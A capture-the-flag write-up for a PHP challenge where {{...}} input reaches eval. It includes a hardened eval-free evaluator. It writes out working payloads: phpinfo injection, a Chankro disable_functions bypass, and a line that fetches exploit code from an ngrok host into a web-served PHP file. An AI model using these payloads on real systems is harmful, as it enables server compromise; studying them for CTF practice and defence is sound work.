Description
We were given the source code and the Dockerfile, so we can build the challenge locally and work on it directly on our own system.
Code Review
Code snippet from index.php (PHP part only):
Line 7 of the code contains an eval call inside the do_calcs function.
do_calcs is called on line 17. Before examining this further, we need to look at line 4, which contains a regular expression pattern.
The pattern tells us that our PHP code must be placed between double braces, as in {{PHP EVAL CODE}}, for it to reach eval and be evaluated.
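The pattern described above (user-controlled text captured from between {{ and }} and passed to eval), as an added example that is not the challenge's own index.php, shown beside a hardened version that drops eval in favour of a small arithmetic evaluator. Function and class names are assumptions, since the original code is not reproduced here.

```php
<?php
// Added example (not the challenge's own index.php); names are assumptions, PHP 8.
// Vulnerable: the {{...}} capture reaches eval() unchanged. disable_functions does
// not close this: eval is a language construct, and anything left off the list
// (file_get_contents, file_put_contents, ...) stays callable from inside it.
function do_calcs_vulnerable(string $input): string {
    return preg_replace_callback('/\{\{(.*?)\}\}/s',
        fn (array $m): string => (string) eval('return ' . $m[1] . ';'), $input);
}
// Hardened: no eval. A small precedence-climbing evaluator accepts only numbers,
// + - * / and parentheses, so "{{phpinfo()}}" throws instead of being executed.
final class Calc {
    private const PREC = ['+' => 1, '-' => 1, '*' => 2, '/' => 2];
    private array $t;
    private int $i = 0;
    public function __construct(string $expr) {
        if (!preg_match('/^[0-9\s.()+\-*\/]+$/', $expr)) {
            throw new InvalidArgumentException('only numbers, + - * / and ( ) are allowed');
        }
        $this->t = preg_split('/\s*([()+\-*\/])\s*|\s+/', $expr, -1, PREG_SPLIT_DELIM_CAPTURE | PREG_SPLIT_NO_EMPTY); // operators stay as tokens
    }
    public function run(): float {
        $v = $this->parse();
        if ($this->i !== count($this->t)) throw new InvalidArgumentException('trailing input');
        return $v;
    }
    private function parse(int $minPrec = 0): float {   // binary operators, left-assoc by precedence
        $v = $this->atom();
        while (($op = $this->t[$this->i] ?? null) !== null && isset(self::PREC[$op]) && self::PREC[$op] >= $minPrec) {
            $this->i++;
            $r = $this->parse(self::PREC[$op] + 1);
            $v = match ($op) { '+' => $v + $r, '-' => $v - $r, '*' => $v * $r, '/' => $v / $r }; // PHP 8: x/0 throws
        }
        return $v;
    }
    private function atom(): float {   // number | '(' expr ')'
        $tok = $this->t[$this->i++] ?? null;
        if ($tok === '(') {
            $v = $this->parse();
            if (($this->t[$this->i++] ?? null) !== ')') throw new InvalidArgumentException('missing )');
            return $v;
        }
        if ($tok !== null && is_numeric($tok)) return (float) $tok;
        throw new InvalidArgumentException('malformed expression');
    }
}
function do_calcs_hardened(string $input): string {
    return preg_replace_callback('/\{\{(.*?)\}\}/s',
        fn (array $m): string => (string) (new Calc($m[1]))->run(), $input);
}
```

With the hardened version, "200,{{2*(3+4)}}" still yields "200,14", while a function call inside the braces is rejected before anything is executed.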
Solution
Let's try sending a simple payload: 200,{{phpinfo()}}
This simple phpinfo call is executed.
But if we look at the disabled functions list in the phpinfo output, we see the functions that are restricted and not available for use:
exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,pcntl_exec,expect_popen
To bypass disabled functions in a case like this, we can use Chankro.
First let’s build our payload:
python2 chankro.py --arch 64 --input shell.sh --path /var/www/html --output exploit.txt
The shell.sh content:
#!/bin/sh
/readflag > /var/www/html/flag.txt
Now that the payload has been generated, we can host it on a local web server (PHP or Python will do) and fetch it from the target:
200,{{file_put_contents("/var/www/html/exploit.php",file_get_contents("http://XXXXXXXXX.ngrok.io/exploit.txt"),FILE_APPEND)}}
After that we can browse to http://127.0.0.1:1337/exploit.php
Flag
We should now be able to retrieve the flag at http://127.0.0.1:1337/flag.txt